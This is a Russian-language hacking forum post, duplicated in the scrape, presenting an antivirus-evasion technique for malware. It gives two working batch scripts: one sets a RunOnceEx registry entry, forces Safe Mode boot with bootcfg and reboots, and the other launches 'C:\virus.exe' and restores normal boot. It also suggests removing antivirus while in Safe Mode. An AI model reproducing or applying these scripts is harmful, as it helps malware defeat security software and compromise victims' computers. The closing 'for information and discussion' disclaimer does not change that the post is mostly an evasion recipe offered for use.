Всем привет, обычно такими делами не занимаюсь, но где-то на прошлой неделе что-то заморочился, а как можно обойти антивирус, да и вообще любую защиту, не знаю на хер мне это нужно, но что-то не смог сдержаться...
Хотелось найти какой-либо универсальный способ, который-бы действовал на все средства защиты, ну или почти на все ! ;)
Что в этоге получилось, а я подумал, почему-бы не запускать наш зловред в безопасном режиме, а почему-бы и нет, ведь в безопасном режиме не запускаются встроенные средства защиты винды, и самое главное ненавистные антивирусы ! :)
Суть идеи вот в чём:
Вирус при первом запуске перезапускает систему в безопасном режиме не выполняя при этом каких-либо опасных, либо подозрительных действий, далее уже в безопасном режиме делай, что хочешь ! ;)
Думал я как это реализовать, пока нашёл решение при помощи батников, что я сделал, при первом запуске вирус создаёт батник и исполняет его, тем самым перезагружает систему в сейф мод., и от туда-уже запускает себя и делает что нужно...
Ну думаю хватит филосовствовать, перейдём к делу, хочу привести код батника, который получился, в общем-то всё просто:
В моём случае, я запускал ещё и второй батник С:\StartVirus.bat, но вы можете сразу запускать свой вирус...
Хочу привести код второго батника, который создавал мой вирус и расскажу для чего он нужен:
Ну во первых это запуск уже вируса, код Start C:\virus.exe
Ну а во вторых обратите внимание на код:
Это ни что иное, как восстановление нормальной загрузки винды ! ;)
Все батники протестированы на хрюше и 100% работают, на 7-8 не проверял !
В этоге можем реализовать такое в любой системе программирования, хоть плюсы, хоть делфи, хоть в чём ещё, т.к. батники это всего-лишь вспомогательный функцианалл, а вирус уже может делать, что угодно, вплоть до удаления антивирусов из системы !
И ещё хочу добавить, вовсе не обязательно создавать батники, можно выполнять эти команды из оболочки вируса, в общем можете делать, как хотите, как скажет ваша фантазия ! ;)
У меня всё, при желании можете развить эту тему ! ;)
З.Ы. Выкладывал эту тему на одном хакерском ресурсе, где профессионально создают малваре, но что-то там сказали, что всё это херня и не актуально, хочется узнать мнение здесь, если есть знающие люди !
Ведь в сейф моде можно реализовать функционалл удаления АВ !
ДЛЯ ОЗНАКОМЛЕНИЯ И ОБСУЖДЕНИЯ !!!
Хотелось найти какой-либо универсальный способ, который-бы действовал на все средства защиты, ну или почти на все ! ;)
Что в этоге получилось, а я подумал, почему-бы не запускать наш зловред в безопасном режиме, а почему-бы и нет, ведь в безопасном режиме не запускаются встроенные средства защиты винды, и самое главное ненавистные антивирусы ! :)
Суть идеи вот в чём:
Вирус при первом запуске перезапускает систему в безопасном режиме не выполняя при этом каких-либо опасных, либо подозрительных действий, далее уже в безопасном режиме делай, что хочешь ! ;)
Думал я как это реализовать, пока нашёл решение при помощи батников, что я сделал, при первом запуске вирус создаёт батник и исполняет его, тем самым перезагружает систему в сейф мод., и от туда-уже запускает себя и делает что нужно...
Ну думаю хватит филосовствовать, перейдём к делу, хочу привести код батника, который получился, в общем-то всё просто:
Код:
@ECHO OFF
ECHO Rebooting into Safe Mode
SET LMROEX=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
REG ADD %LMROEX% /V TITLE /D "LM-ROEX SafeMoe" /f
REG ADD %LMROEX%\101 /vE /d "SafeMoe Installs" /f
REG ADD %LMROEX%\101 /v 1 /d С:\StartVirus.bat /f
bootcfg /raw /a /safeboot:minimal /id 1
SHUTDOWN -r -f -t 01
В моём случае, я запускал ещё и второй батник С:\StartVirus.bat, но вы можете сразу запускать свой вирус...
Хочу привести код второго батника, который создавал мой вирус и расскажу для чего он нужен:
Код:
@ECHO OFF
ECHO Safe Mode Installs
Start C:\virus.exe
ECHO Rebooting into Normal Mode
bootcfg /raw /fastdetect /id 1
SHUTDOWN -r -f -t 01
Ну во первых это запуск уже вируса, код Start C:\virus.exe
Ну а во вторых обратите внимание на код:
Код:
bootcfg /raw /fastdetect /id 1
SHUTDOWN -r -f -t 0
Это ни что иное, как восстановление нормальной загрузки винды ! ;)
Все батники протестированы на хрюше и 100% работают, на 7-8 не проверял !
В этоге можем реализовать такое в любой системе программирования, хоть плюсы, хоть делфи, хоть в чём ещё, т.к. батники это всего-лишь вспомогательный функцианалл, а вирус уже может делать, что угодно, вплоть до удаления антивирусов из системы !
И ещё хочу добавить, вовсе не обязательно создавать батники, можно выполнять эти команды из оболочки вируса, в общем можете делать, как хотите, как скажет ваша фантазия ! ;)
У меня всё, при желании можете развить эту тему ! ;)
З.Ы. Выкладывал эту тему на одном хакерском ресурсе, где профессионально создают малваре, но что-то там сказали, что всё это херня и не актуально, хочется узнать мнение здесь, если есть знающие люди !
Ведь в сейф моде можно реализовать функционалл удаления АВ !
ДЛЯ ОЗНАКОМЛЕНИЯ И ОБСУЖДЕНИЯ !!!